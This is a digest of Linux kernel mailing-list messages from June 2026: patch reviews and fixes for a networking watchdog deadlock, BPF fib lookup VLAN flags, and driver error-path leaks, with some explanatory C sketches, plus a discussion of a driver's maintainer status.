* Re: [PATCH v4 2/9] rust: module: add `THIS_MODULE` const to `ModuleMetadata` trait
From: Andreas Hindborg @ 2026-06-23 12:28 UTC
To: Alvin Sun, Miguel Ojeda, Boqun Feng, Gary Guo,
Björn Roy Baron, Benno Lossin, Alice Ryhl, Trevor Gross,
Danilo Krummrich, Luis Chamberlain, Petr Pavlu, Daniel Gomez,
Sami Tolvanen, Aaron Tomlin, Greg Kroah-Hartman,
Rafael J. Wysocki, David Airlie, Simona Vetter, Daniel Almeida,
Arnd Bergmann, Brendan Higgins, David Gow, Rae Moar, Breno Leitao,
Jens Axboe, Dave Ertman, Ira Weiny, Leon Romanovsky, Igor Korotin,
FUJITA Tomonori, Bjorn Helgaas, Krzysztof Wilczyński,
Arve Hjønnevåg, Todd Kjos, Christian Brauner,
Carlos Llamas
Cc: rust-for-linux, linux-modules, driver-core, dri-devel, nova-gpu,
linux-kselftest, kunit-dev, linux-block, linux-kernel, netdev,
linux-pci, Alvin Sun
In-Reply-To: <20260623-fix-fops-owner-v4-2-0daf5f077d5c@linux.dev>
Alvin Sun <alvin.sun@linux.dev> writes:
> Since `const_refs_to_static` has been stable as of the MSRV bump, a
> `ThisModule` pointer can now be used in const contexts.
>
> Add a `THIS_MODULE` const to the `ModuleMetadata` trait so that modules
> can provide their `ThisModule` pointer in const contexts such as static
> `file_operations`.
>
> Add a `this_module()` helper to retrieve the `THIS_MODULE` pointer of a
> given module type, and update `__init` to use it instead of the
> `THIS_MODULE` static generated by the `module!` macro.
>
> The `static THIS_MODULE` generated by the `module!` macro is retained
> for backwards compatibility with existing users and removed in a later
> patch once all references have been migrated.
>
> Signed-off-by: Alvin Sun <alvin.sun@linux.dev>
Reviewed-by: Andreas Hindborg <a.hindborg@kernel.org>
Best regards,
Andreas Hindborg
* Re: [PATCH net] net: do not acquire dev->tx_global_lock in netdev_watchdog_up()
From: Simon Horman @ 2026-06-23 12:22 UTC
To: Eric Dumazet
Cc: David S . Miller, Jakub Kicinski, Paolo Abeni, netdev,
eric.dumazet, Marek Szyprowski
In-Reply-To: <20260622110108.69541-1-edumazet@google.com>
On Mon, Jun 22, 2026 at 11:01:08AM +0000, Eric Dumazet wrote:
> Marek Szyprowski reported a deadlock during system resume when virtio_net
> driver is used.
>
> The deadlock occurs because netif_device_attach() is called while holding
> dev->tx_global_lock (via netif_tx_lock_bh() in virtnet_restore_up()).
> netif_device_attach() calls __netdev_watchdog_up(), which now also tries
> to acquire dev->tx_global_lock to synchronize with dev_watchdog().
>
> This recursive lock acquisition results in a deadlock.
>
> Fix this by removing the tx_global_lock acquisition from netdev_watchdog_up().
>
> The critical state (watchdog_timer and watchdog_ref_held) is already
> protected by dev->watchdog_lock, which was introduced in the blamed commit.
>
> Fixes: 8eed5519e496 ("net: watchdog: fix refcount tracking races")
> Reported-by: Marek Szyprowski <m.szyprowski@samsung.com>
> Closes: https://lore.kernel.org/netdev/a443376e-5187-4268-93b3-58047ef113a8@samsung.com/
> Signed-off-by: Eric Dumazet <edumazet@google.com>
> Tested-by: Marek Szyprowski <m.szyprowski@samsung.com>
Reviewed-by: Simon Horman <horms@kernel.org>
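
The recursive acquisition described in the commit message can be modelled in userspace. This is a minimal sketch, not the kernel code: `toy_lock`, `toy_dev`, `watchdog_up_old()`, `watchdog_up_new()` and `resume_with()` are hypothetical names, and the toy lock reports -EDEADLK where a real non-recursive lock would simply hang.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/* Toy non-recursive lock: it only records whether it is held. */
struct toy_lock {
	bool held;
};

static int toy_lock_acquire(struct toy_lock *l)
{
	if (l->held)
		return -EDEADLK;	/* a real lock would block forever here */
	l->held = true;
	return 0;
}

static void toy_lock_release(struct toy_lock *l)
{
	assert(l->held);
	l->held = false;
}

struct toy_dev {
	struct toy_lock tx_global_lock;
	struct toy_lock watchdog_lock;
	bool watchdog_armed;
};

/* Models the behaviour before the fix: tx_global_lock is taken as well. */
static int watchdog_up_old(struct toy_dev *d)
{
	int err = toy_lock_acquire(&d->tx_global_lock);

	if (err)
		return err;
	err = toy_lock_acquire(&d->watchdog_lock);
	if (!err) {
		d->watchdog_armed = true;
		toy_lock_release(&d->watchdog_lock);
	}
	toy_lock_release(&d->tx_global_lock);
	return err;
}

/* Models the behaviour after the fix: watchdog_lock alone guards the state. */
static int watchdog_up_new(struct toy_dev *d)
{
	int err = toy_lock_acquire(&d->watchdog_lock);

	if (err)
		return err;
	d->watchdog_armed = true;
	toy_lock_release(&d->watchdog_lock);
	return 0;
}

/* Models the resume path: the caller already holds tx_global_lock. */
static int resume_with(int (*watchdog_up)(struct toy_dev *), struct toy_dev *d)
{
	int err = toy_lock_acquire(&d->tx_global_lock);

	if (err)
		return err;
	err = watchdog_up(d);
	toy_lock_release(&d->tx_global_lock);
	return err;
}
```

Calling `resume_with(watchdog_up_old, &d)` on a zero-initialised `toy_dev` fails on the second acquisition of `tx_global_lock`, while `resume_with(watchdog_up_new, &d)` arms the watchdog, because the inner function no longer touches the lock its caller holds.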
* Re: [PATCH v1 0/3] thunderbold: A few cleanups
From: Mika Westerberg @ 2026-06-23 12:17 UTC
To: Uwe Kleine-König (The Capable Hub)
Cc: Mika Westerberg, Yehezkel Bernat, Andreas Noever, Andrew Lunn,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
netdev, linux-kernel, linux-usb
In-Reply-To: <cover.1781776904.git.u.kleine-koenig@baylibre.com>
Hi,
On Thu, Jun 18, 2026 at 12:14:49PM +0200, Uwe Kleine-König (The Capable Hub) wrote:
> Hello,
>
> I'm currently working on a project that includes looking at all device
> ID structures from <linux/mod_devicetable.h>. While doing that for
> tb_service_id, I spotted these patch opportunities.
>
> These are all non-critical and also my quest doesn't depend on this, so
> there is no urge to apply these patches. My suggestion is to apply them
> via the thunderbold tree during the next merge window with an ack from
> the network guys.
>
> The first patch touches drivers/net and drivers/thunderbold. It could
> theoretically be split, but then this results in at least 3 commits which
> seems excessive to handle three drivers, so I kept it as a single patch.
>
> The third patch is a style change and so is subjective. Drop it, if you
> don't like it. Here splitting would be easy, but given that patch #1
> already touches the same files, letting these go in together without
> splitting seems to be sensible.
>
> Best regards
> Uwe
>
> Uwe Kleine-König (The Capable Hub) (3):
> thunderbold: Stop passing matched device ID to .probe()
> thunderbold: Assert that a service driver has a probe callback
> thunderbold: Drop comma after device id array terminator
Fixed the typo "thunderbold" -> "thunderbolt" and applied all to
thunderbolt.git/next. I also took the networking patch, let me know if
that's not okay (I'm the maintainer of that driver too and it looked fine).
Thanks!
* Re: [PATCH bpf-next v4 2/3] bpf: Add BPF_FIB_LOOKUP_VLAN_INPUT flag to bpf_fib_lookup() helper
From: Toke Høiland-Jørgensen @ 2026-06-23 12:00 UTC
To: Avinash Duduskar, ast, daniel, andrii
Cc: eddyz87, memxor, martin.lau, song, yonghong.song, jolsa, emil,
john.fastabend, sdf, davem, edumazet, kuba, pabeni, horms, shuah,
hawk, yatsenko, leon.hwang, kpsingh, a.s.protopopov, ameryhung,
rongtao, eyal.birger, bpf, netdev, linux-kernel, linux-kselftest,
dsahern
In-Reply-To: <20260623025147.1001664-3-avinash.duduskar@gmail.com>
Avinash Duduskar <avinash.duduskar@gmail.com> writes:
> BPF_FIB_LOOKUP_VLAN resolves a VLAN egress. The reverse is also
> useful: an XDP program receiving a VLAN-tagged frame on a physical
> device wants the lookup to behave as if the packet had arrived on the
> corresponding VLAN subinterface, so iif-based policy routing and VRF
> table selection use the right ingress.
>
> Add BPF_FIB_LOOKUP_VLAN_INPUT. When set, params->h_vlan_proto and
> params->h_vlan_TCI are read as an input VLAN tag and the matching VLAN
> device of params->ifindex is resolved with __vlan_find_dev_deep_rcu().
> The device must be up and in the same network namespace as
> params->ifindex (a VLAN device can be moved to another netns while
> registered on its parent; receive would deliver into that other
> namespace, which a lookup here cannot represent). If params->ifindex
> is itself a VLAN device, its inner (QinQ) subinterface is matched.
> For a bond or team, a tag on a port matches no device and returns
> NOT_FWDED; pass the master's ifindex.
> The lookup then runs with the resolved device as the ingress;
> params->ifindex itself is not modified on the input side. When the
> resolved device is enslaved to a VRF, both the full lookup (via the
> l3mdev rule) and BPF_FIB_LOOKUP_DIRECT (via l3mdev_fib_table_rcu())
> select the VRF's table from the resolved ingress. That follows from
> feeding the resolved device to the flow as the ingress
> (fl4.flowi4_iif = dev->ifindex), which is what makes l3mdev resolve
> the VRF master from the subinterface rather than from
> params->ifindex.
>
> The two failure classes get different treatment on purpose. A
> h_vlan_proto other than 802.1Q/802.1ad is API misuse and returns
> -EINVAL, since it would otherwise reach the WARN in vlan_proto_idx()
> with a program-controlled value. An unmatched VID, a device that is
> down, or one in another namespace is a data outcome and returns
> BPF_FIB_LKUP_RET_NOT_FWDED, matching the DIRECT path when
> fib_get_table() finds no table and mirroring real ingress, where the
> receive path drops such frames. A VID of 0 (a priority tag) is looked
> up literally and normally fails the same way; receive instead
> processes such frames untagged, so callers should not set the flag for
> priority tags. Proceeding on the physical device for any of these
> would be fail-open for the policy-routing cases above.
>
> The h_vlan fields share a union with tbid, so the flag cannot be
> combined with BPF_FIB_LOOKUP_TBID. It describes ingress, so it also
> cannot be combined with BPF_FIB_LOOKUP_OUTPUT. Both combinations
> return -EINVAL; restricting now keeps a later relaxation backward
> compatible. Combining with BPF_FIB_LOOKUP_VLAN is allowed: the tag is
> consumed on the ingress side and the egress tag is written on
> success.
>
> Under !CONFIG_VLAN_8021Q the __vlan_find_dev_deep_rcu() stub returns
> NULL, so every lookup with the flag returns NOT_FWDED, which is
> correct since no VLAN device can exist.
>
> Suggested-by: Toke Høiland-Jørgensen <toke@redhat.com>
> Signed-off-by: Avinash Duduskar <avinash.duduskar@gmail.com>
Reviewed-by: Toke Høiland-Jørgensen <toke@redhat.com>
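
The input checks described in the commit message (rejected flag combinations and the h_vlan_proto validation) can be sketched in plain C. This is an illustration under stated assumptions, not the code from the patch: the `TOY_*` names and `toy_check_vlan_input()` are hypothetical, the bit chosen for `TOY_FIB_LOOKUP_VLAN_INPUT` is assumed, and h_vlan_proto is kept in host byte order for simplicity.

```c
#include <assert.h>
#include <errno.h>
#include <stdint.h>

/* Toy mirrors of the lookup flags; the VLAN_INPUT bit is an assumption. */
#define TOY_FIB_LOOKUP_OUTPUT		(1u << 1)
#define TOY_FIB_LOOKUP_TBID		(1u << 3)
#define TOY_FIB_LOOKUP_VLAN		(1u << 6)
#define TOY_FIB_LOOKUP_VLAN_INPUT	(1u << 7)

#define TOY_ETH_P_8021Q		0x8100	/* 802.1Q */
#define TOY_ETH_P_8021AD	0x88A8	/* 802.1ad */

struct toy_params {
	uint16_t h_vlan_proto;	/* host byte order in this sketch */
};

/* Returns 0 if the lookup may proceed, -EINVAL on API misuse. */
static int toy_check_vlan_input(uint32_t flags, const struct toy_params *p)
{
	assert(p);

	if (!(flags & TOY_FIB_LOOKUP_VLAN_INPUT))
		return 0;

	/* h_vlan_* shares a union with tbid, and the flag describes ingress. */
	if (flags & (TOY_FIB_LOOKUP_TBID | TOY_FIB_LOOKUP_OUTPUT))
		return -EINVAL;

	/* Any other protocol is treated as misuse, not as a data outcome. */
	if (p->h_vlan_proto != TOY_ETH_P_8021Q &&
	    p->h_vlan_proto != TOY_ETH_P_8021AD)
		return -EINVAL;

	return 0;
}
```

An unmatched VID, a device that is down, or a device in another namespace would be handled after this check and reported as NOT_FWDED rather than -EINVAL, which is the split between the two failure classes that the commit message describes.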
* Re: [PATCH bpf-next v4 1/3] bpf: Add BPF_FIB_LOOKUP_VLAN flag to bpf_fib_lookup() helper
From: Toke Høiland-Jørgensen @ 2026-06-23 11:58 UTC
To: Avinash Duduskar, ast, daniel, andrii
Cc: eddyz87, memxor, martin.lau, song, yonghong.song, jolsa, emil,
john.fastabend, sdf, davem, edumazet, kuba, pabeni, horms, shuah,
hawk, yatsenko, leon.hwang, kpsingh, a.s.protopopov, ameryhung,
rongtao, eyal.birger, bpf, netdev, linux-kernel, linux-kselftest,
dsahern
In-Reply-To: <20260623025147.1001664-2-avinash.duduskar@gmail.com>
Avinash Duduskar <avinash.duduskar@gmail.com> writes:
> bpf_fib_lookup() returns the FIB-resolved egress ifindex straight
> from the fib result. When the egress is a VLAN device, the returned
> ifindex is the VLAN netdev's, which has no XDP xmit handler; XDP
> programs that want to forward the frame (e.g. xdp-forward) must
> instead target the underlying physical device and push the VLAN tag
> themselves. Today the program has no way to learn either the
> underlying ifindex or the VLAN tag without maintaining its own
> VLAN-to-ifindex map in userspace and refreshing it on netlink
> events.
>
> Add BPF_FIB_LOOKUP_VLAN. When the caller sets this flag and the fib
> result is a VLAN device whose immediate parent is a real (non-VLAN)
> device in the same network namespace, populate the existing output
> fields params->h_vlan_proto and params->h_vlan_TCI from the VLAN
> device and replace params->ifindex with the parent's ifindex.
> params->h_vlan_TCI carries the VID only, with PCP and DEI bits zero; a
> consumer wanting to set egress priority writes PCP itself.
> params->smac is the VLAN device's own address, which can differ from
> the parent's.
>
> Only the immediate parent is resolved, via vlan_dev_priv(dev)->real_dev
> and not vlan_dev_real_dev(), which walks to the bottom of a stack. When
> the immediate parent is not a real device in the same namespace, the
> lookup returns BPF_FIB_LKUP_RET_VLAN_FAILURE and leaves params->ifindex
> at the input. This covers a stacked VLAN (QinQ), where the immediate
> parent is itself a VLAN device and one h_vlan_proto/h_vlan_TCI pair
> cannot describe two tags, and a parent in another network namespace (a
> VLAN device can be moved while its parent stays), whose ifindex would
> be meaningless in the caller's namespace. A program that wants the VLAN
> device's own ifindex re-issues the lookup without BPF_FIB_LOOKUP_VLAN,
> so the unreducible case stays distinct from a physical egress. That
> distinction matters for XDP: a program cannot xmit on a VLAN device, so
> a success carrying the VLAN ifindex would make it redirect to a device
> with no ndo_xdp_xmit and drop the frame at xdp_do_flush(). The swap and
> the vlan fields are written only on the reduce path; other output
> fields keep their existing behaviour, so a frag-needed result still
> reports the route mtu in params->mtu_result.
>
> On the skb path without tot_len the deferred mtu check is done against
> the resolved egress device. To keep that the VLAN device rather than
> the parent after the swap, bpf_ipv4_fib_lookup()/bpf_ipv6_fib_lookup()
> hand the FIB-result device back to the caller; the XDP path always
> runs the route-mtu check and passes NULL. When the flag is not set,
> behaviour is unchanged: h_vlan_proto and h_vlan_TCI are zeroed and
> ifindex is left at the FIB result.
>
> The new block is compiled only under CONFIG_VLAN_8021Q since
> vlan_dev_priv() is not defined otherwise; without that config
> is_vlan_dev() is constant false and the flag is accepted but never
> acts. That is safe because no VLAN device can exist there, so every
> egress is already physical.
>
> This lets an XDP redirect target the physical device and learn the
> tag to push in a single lookup, which xdp-forward's optional VLAN
> mode (xdp-project/xdp-tools#504) wants from the kernel side.
>
> The helper's input semantics are unchanged; the reverse direction
> (supplying a tag as lookup input) is added in the following patch.
>
> Suggested-by: Toke Høiland-Jørgensen <toke@redhat.com>
> Signed-off-by: Avinash Duduskar <avinash.duduskar@gmail.com>
> ---
> include/uapi/linux/bpf.h | 28 +++++++++++++-
> net/core/filter.c | 69 ++++++++++++++++++++++++----------
> tools/include/uapi/linux/bpf.h | 28 +++++++++++++-
> 3 files changed, 104 insertions(+), 21 deletions(-)
>
> diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
> index 89b36de5fdbb..8d0058d88eb2 100644
> --- a/include/uapi/linux/bpf.h
> +++ b/include/uapi/linux/bpf.h
> @@ -3532,6 +3532,26 @@ union bpf_attr {
> * Use the mark present in *params*->mark for the fib lookup.
> * This option should not be used with BPF_FIB_LOOKUP_DIRECT,
> * as it only has meaning for full lookups.
> + * **BPF_FIB_LOOKUP_VLAN**
> + * If the fib lookup resolves to a VLAN device whose
> + * parent is a real (non-VLAN) device, set
> + * *params*->h_vlan_proto and *params*->h_vlan_TCI from
> + * the VLAN device and replace *params*->ifindex with the
> + * parent's ifindex. *params*->h_vlan_TCI carries the VID
> + * only, with PCP and DEI bits zero; a consumer wanting to
> + * set egress priority writes PCP itself. *params*->smac is
> + * the VLAN device's own address, which can differ from the
> + * parent's. Only the immediate parent is resolved; if it
> + * is itself a VLAN device (QinQ) or in another namespace,
> + * the egress cannot be reduced to a physical device plus
> + * one tag and the lookup returns
> + * **BPF_FIB_LKUP_RET_VLAN_FAILURE** with *params*->ifindex
> + * left at the input. Re-issue without
> + * **BPF_FIB_LOOKUP_VLAN** to obtain the VLAN device's own
> + * ifindex. The swap and the vlan fields
> + * are written only on success; other output fields keep
> + * the helper's existing behaviour, so a frag-needed result
> + * still reports the route mtu in *params*->mtu_result.
> *
> * *ctx* is either **struct xdp_md** for XDP programs or
> * **struct sk_buff** tc cls_act programs.
> @@ -7327,6 +7347,7 @@ enum {
> BPF_FIB_LOOKUP_TBID = (1U << 3),
> BPF_FIB_LOOKUP_SRC = (1U << 4),
> BPF_FIB_LOOKUP_MARK = (1U << 5),
> + BPF_FIB_LOOKUP_VLAN = (1U << 6),
> };
>
> enum {
> @@ -7340,6 +7361,7 @@ enum {
> BPF_FIB_LKUP_RET_NO_NEIGH, /* no neighbor entry for nh */
> BPF_FIB_LKUP_RET_FRAG_NEEDED, /* fragmentation required to fwd */
> BPF_FIB_LKUP_RET_NO_SRC_ADDR, /* failed to derive IP src addr */
> + BPF_FIB_LKUP_RET_VLAN_FAILURE, /* VLAN egress, parent unresolvable */
> };
>
> struct bpf_fib_lookup {
> @@ -7393,7 +7415,11 @@ struct bpf_fib_lookup {
>
> union {
> struct {
> - /* output */
> + /*
> + * output with BPF_FIB_LOOKUP_VLAN: set from the
> + * resolved egress VLAN device (see the flag); zeroed
> + * on other successful lookups.
> + */
> __be16 h_vlan_proto;
> __be16 h_vlan_TCI;
> };
> diff --git a/net/core/filter.c b/net/core/filter.c
> index 2e96b4b847ce..8345295d84de 100644
> --- a/net/core/filter.c
> +++ b/net/core/filter.c
> @@ -6201,10 +6201,28 @@ static const struct bpf_func_proto bpf_skb_get_xfrm_state_proto = {
> #endif
>
> #if IS_ENABLED(CONFIG_INET) || IS_ENABLED(CONFIG_IPV6)
> -static int bpf_fib_set_fwd_params(struct bpf_fib_lookup *params, u32 mtu)
> +static int bpf_fib_set_fwd_params(struct net_device *dev,
> + struct bpf_fib_lookup *params,
> + u32 flags, u32 mtu)
> {
> params->h_vlan_TCI = 0;
> params->h_vlan_proto = 0;
> +
> +#if IS_ENABLED(CONFIG_VLAN_8021Q)
> + if ((flags & BPF_FIB_LOOKUP_VLAN) && is_vlan_dev(dev)) {
If you move the ifdef into the if statement, the if statement can have
an else-branch that assigns params->ifindex, so you don't need the
restore dance (see below).
> + struct net_device *real_dev = vlan_dev_priv(dev)->real_dev;
> +
> + if (!is_vlan_dev(real_dev) &&
> + net_eq(dev_net(real_dev), dev_net(dev))) {
> + params->h_vlan_proto = vlan_dev_vlan_proto(dev);
> + params->h_vlan_TCI = htons(vlan_dev_vlan_id(dev));
> + params->ifindex = real_dev->ifindex;
> + } else {
> + return BPF_FIB_LKUP_RET_VLAN_FAILURE;
> + }
> + }
> +#endif
> +
> if (mtu)
> params->mtu_result = mtu; /* union with tot_len */
>
> @@ -6214,8 +6232,10 @@ static int bpf_fib_set_fwd_params(struct bpf_fib_lookup *params, u32 mtu)
>
> #if IS_ENABLED(CONFIG_INET)
> static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
> - u32 flags, bool check_mtu)
> + u32 flags, bool check_mtu,
> + struct net_device **fwd_dev)
> {
> + u32 in_ifindex = params->ifindex;
> struct neighbour *neigh = NULL;
> struct fib_nh_common *nhc;
> struct in_device *in_dev;
> @@ -6347,16 +6367,23 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
> memcpy(params->smac, dev->dev_addr, ETH_ALEN);
>
> set_fwd_params:
> - return bpf_fib_set_fwd_params(params, mtu);
> + if (fwd_dev)
> + *fwd_dev = dev;
> + err = bpf_fib_set_fwd_params(dev, params, flags, mtu);
> + if (err == BPF_FIB_LKUP_RET_VLAN_FAILURE)
> + params->ifindex = in_ifindex;
> + return err;
I think it's better to just move the assignment of params->ifindex
entirely into bpf_fib_set_fwd_params(), instead of this restore dance.
That way this can be simplified to:
	err = bpf_fib_set_fwd_params(dev, params, flags, mtu);
	if (!err && fwd_dev)
		*fwd_dev = dev;
	return err;
> }
> #endif
>
> #if IS_ENABLED(CONFIG_IPV6)
> static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
> - u32 flags, bool check_mtu)
> + u32 flags, bool check_mtu,
> + struct net_device **fwd_dev)
> {
> struct in6_addr *src = (struct in6_addr *) params->ipv6_src;
> struct in6_addr *dst = (struct in6_addr *) params->ipv6_dst;
> + u32 in_ifindex = params->ifindex;
> struct fib6_result res = {};
> struct neighbour *neigh;
> struct net_device *dev;
> @@ -6486,13 +6513,19 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
> memcpy(params->smac, dev->dev_addr, ETH_ALEN);
>
> set_fwd_params:
> - return bpf_fib_set_fwd_params(params, mtu);
> + if (fwd_dev)
> + *fwd_dev = dev;
> + err = bpf_fib_set_fwd_params(dev, params, flags, mtu);
> + if (err == BPF_FIB_LKUP_RET_VLAN_FAILURE)
> + params->ifindex = in_ifindex;
> + return err;
Same as above.
-Toke
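
The commit message notes that params->h_vlan_TCI carries the VID only and that a consumer wanting an egress priority writes PCP itself. A minimal sketch of that step, assuming the standard 802.1Q TCI layout (PCP in the top three bits, VID in the low twelve); `toy_tci_set_pcp()` and the `TOY_*` constants are hypothetical names, not part of the patch:

```c
#include <arpa/inet.h>
#include <assert.h>
#include <stdint.h>

#define TOY_VLAN_VID_MASK	0x0fffu	/* low 12 bits of the TCI */
#define TOY_VLAN_PRIO_SHIFT	13	/* PCP occupies the top 3 bits */

/*
 * Take a VID-only TCI in network byte order and return a TCI, also in
 * network byte order, with the given priority (0..7) added. DEI stays zero.
 */
static uint16_t toy_tci_set_pcp(uint16_t tci_be, unsigned int pcp)
{
	uint16_t vid;

	assert(pcp <= 7);
	vid = ntohs(tci_be) & TOY_VLAN_VID_MASK;
	return htons((uint16_t)((pcp << TOY_VLAN_PRIO_SHIFT) | vid));
}
```

A program would apply something like this to the value returned in params->h_vlan_TCI before pushing the tag; passing a priority of 0 returns the VID-only TCI unchanged.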
* [PATCH] net: sparx5: unregister blocking notifier on init failure
From: Haoxiang Li @ 2026-06-23 11:57 UTC
To: andrew+netdev, davem, edumazet, kuba, pabeni, Steen.Hegelund,
daniel.machon, UNGLinuxDriver, kees, horms, bjarni.jonasson,
lars.povlsen
Cc: netdev, linux-arm-kernel, linux-kernel, Haoxiang Li, stable
sparx5_register_notifier_blocks() registers the switchdev blocking
notifier before allocating the ordered workqueue. If the workqueue
allocation fails, the error path unregisters the switchdev and netdevice
notifiers, but leaves the blocking notifier registered.
Add a separate error label for the workqueue allocation failure path and
unregister the switchdev blocking notifier there.
Fixes: d6fce5141929 ("net: sparx5: add switching support")
Cc: stable@vger.kernel.org
Signed-off-by: Haoxiang Li <haoxiang_li2024@163.com>
---
drivers/net/ethernet/microchip/sparx5/sparx5_switchdev.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_switchdev.c b/drivers/net/ethernet/microchip/sparx5/sparx5_switchdev.c
index 644458108dd2..dac4dd833127 100644
--- a/drivers/net/ethernet/microchip/sparx5/sparx5_switchdev.c
+++ b/drivers/net/ethernet/microchip/sparx5/sparx5_switchdev.c
@@ -765,11 +765,13 @@ int sparx5_register_notifier_blocks(struct sparx5 *s5)
sparx5_owq = alloc_ordered_workqueue("sparx5_order", 0);
if (!sparx5_owq) {
err = -ENOMEM;
- goto err_switchdev_blocking_nb;
+ goto err_alloc_workqueue;
}
return 0;
+err_alloc_workqueue:
+ unregister_switchdev_blocking_notifier(&s5->switchdev_blocking_nb);
err_switchdev_blocking_nb:
unregister_switchdev_notifier(&s5->switchdev_nb);
err_switchdev_nb:
--
2.25.1
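
The effect of jumping to the wrong unwind label can be shown with a small userspace model. This is a sketch under simplifying assumptions, not the driver code: `toy_state` and `toy_register_all()` are hypothetical, the three notifier registrations are assumed to succeed, and only the workqueue allocation can fail.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

struct toy_state {
	bool netdevice_nb;
	bool switchdev_nb;
	bool switchdev_blocking_nb;
	bool workqueue;
};

/*
 * wq_fails: simulate a failed workqueue allocation.
 * fixed:    pick the label added by the patch instead of the old one.
 */
static int toy_register_all(struct toy_state *s, bool wq_fails, bool fixed)
{
	assert(s);

	s->netdevice_nb = true;
	s->switchdev_nb = true;
	s->switchdev_blocking_nb = true;

	if (wq_fails) {
		if (fixed)
			goto err_alloc_workqueue;
		goto err_switchdev_blocking_nb;
	}
	s->workqueue = true;
	return 0;

err_alloc_workqueue:
	/* Undo the last successful step first. */
	s->switchdev_blocking_nb = false;
err_switchdev_blocking_nb:
	s->switchdev_nb = false;
	s->netdevice_nb = false;
	return -ENOMEM;
}
```

With `fixed` set to false the function returns -ENOMEM but leaves `switchdev_blocking_nb` set, which corresponds to the notifier left registered in the unpatched error path; with `fixed` set to true every flag is cleared.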
* [PATCH] octeontx2-af: Free BPID bitmap on setup failure
From: Haoxiang Li @ 2026-06-23 11:43 UTC
To: sgoutham, lcherian, gakula, hkelam, sbhatta, andrew+netdev, davem,
edumazet, kuba, pabeni, horms
Cc: netdev, linux-kernel, Haoxiang Li, stable
nix_setup_bpids() allocates bp->bpids with rvu_alloc_bitmap(), which uses
a plain kcalloc(). If any of the following devm_kcalloc() allocations for
the BPID mapping arrays fails, the function returns without freeing the
bitmap. Free the BPID bitmap before returning from those error paths.
Fixes: d6212d2e41a0 ("octeontx2-af: Create BPIDs free pool")
Cc: stable@vger.kernel.org
Signed-off-by: Haoxiang Li <haoxiang_li2024@163.com>
---
drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c | 11 ++++++++---
1 file changed, 8 insertions(+), 3 deletions(-)
diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
index d8989395e875..0297c7ab0614 100644
--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
@@ -528,19 +528,24 @@ static int nix_setup_bpids(struct rvu *rvu, struct nix_hw *hw, int blkaddr)
bp->fn_map = devm_kcalloc(rvu->dev, bp->bpids.max,
sizeof(u16), GFP_KERNEL);
if (!bp->fn_map)
- return -ENOMEM;
+ goto free_bpids;
bp->intf_map = devm_kcalloc(rvu->dev, bp->bpids.max,
sizeof(u8), GFP_KERNEL);
if (!bp->intf_map)
- return -ENOMEM;
+ goto free_bpids;
bp->ref_cnt = devm_kcalloc(rvu->dev, bp->bpids.max,
sizeof(u8), GFP_KERNEL);
if (!bp->ref_cnt)
- return -ENOMEM;
+ goto free_bpids;
return 0;
+
+free_bpids:
+ rvu_free_bitmap(&bp->bpids);
+ bp->bpids.bmap = NULL;
+ return -ENOMEM;
}
void rvu_nix_flr_free_bpids(struct rvu *rvu, u16 pcifunc)
--
2.25.1
* Re: [PATCH net] net: ethernet: qualcomm: ppe: Demote from supported and fix maintainer addresses
From: Andrew Lunn @ 2026-06-23 11:33 UTC
To: Krzysztof Kozlowski
Cc: Jie Luo, Bjorn Andersson, Michael Turquette, Stephen Boyd,
Brian Masney, Rob Herring, Krzysztof Kozlowski, Conor Dooley,
Andrew Lunn, David S. Miller, Eric Dumazet, Jakub Kicinski,
Paolo Abeni, Lei Wei, Suruchi Agarwal, Pavithra R, linux-kernel,
linux-arm-msm, linux-clk, devicetree, netdev
In-Reply-To: <f8441903-c768-46a1-8f95-b1b25d420a2c@oss.qualcomm.com>
> If address did not work for half a year, I really doubt that you commit
> to above.
I tend to agree. Maybe we should set it to Orphaned, and then decide
in 6 months time if it can be set back to Maintained?
Andrew
* Re: [PATCH net] net: ethernet: qualcomm: ppe: Demote from supported and fix maintainer addresses
From: Andrew Lunn @ 2026-06-23 11:31 UTC
To: Jie Luo
Cc: Krzysztof Kozlowski, Bjorn Andersson, Michael Turquette,
Stephen Boyd, Brian Masney, Rob Herring, Krzysztof Kozlowski,
Conor Dooley, Andrew Lunn, David S. Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, Lei Wei, Suruchi Agarwal, Pavithra R,
linux-kernel, linux-arm-msm, linux-clk, devicetree, netdev
In-Reply-To: <8b0560ae-af5c-4d54-be02-d186be1d799c@oss.qualcomm.com>
On Tue, Jun 23, 2026 at 05:42:34PM +0800, Jie Luo wrote:
>
>
> On 6/23/2026 4:10 PM, Andrew Lunn wrote:
> >> Driver is not supported - in terms of how netdev understands supported
> >> commitment - if maintainer does not care to receive the patches for its
> >> code, so demote it to "maintained" to reflect true status.
> >
> > Maybe "Orphan" would be better, if the listed Maintainer is not doing
> > any Maintainer work?
> >
> > Andrew
>
> Hello Andrew, Krzysztof,
> I will continue to maintain the listed drivers, so their status can
> remain Supported.
Please understand that being a Maintainer requires that you respond to
patches and questions about this driver, give Reviewed-by:, ask for
patches to be changed etc. If you don't respond, ideally within 2 to 3
days, the driver will be set to Orphaned.
If you want to maintain the Supported status, we can help you set up
the needed CI system, and get it registered so it reports the results.
Andrew
* Re: [PATCH net v3 1/2] net: ethernet: sunplus: spl2sw: fix phy_node refcount leak in remove
From: Andrew Lunn @ 2026-06-23 11:24 UTC
To: Shitalkumar Gandhi
Cc: Wells Lu, Jakub Kicinski, David S. Miller, Eric Dumazet,
Paolo Abeni, Simon Horman, netdev, linux-kernel,
Shitalkumar Gandhi
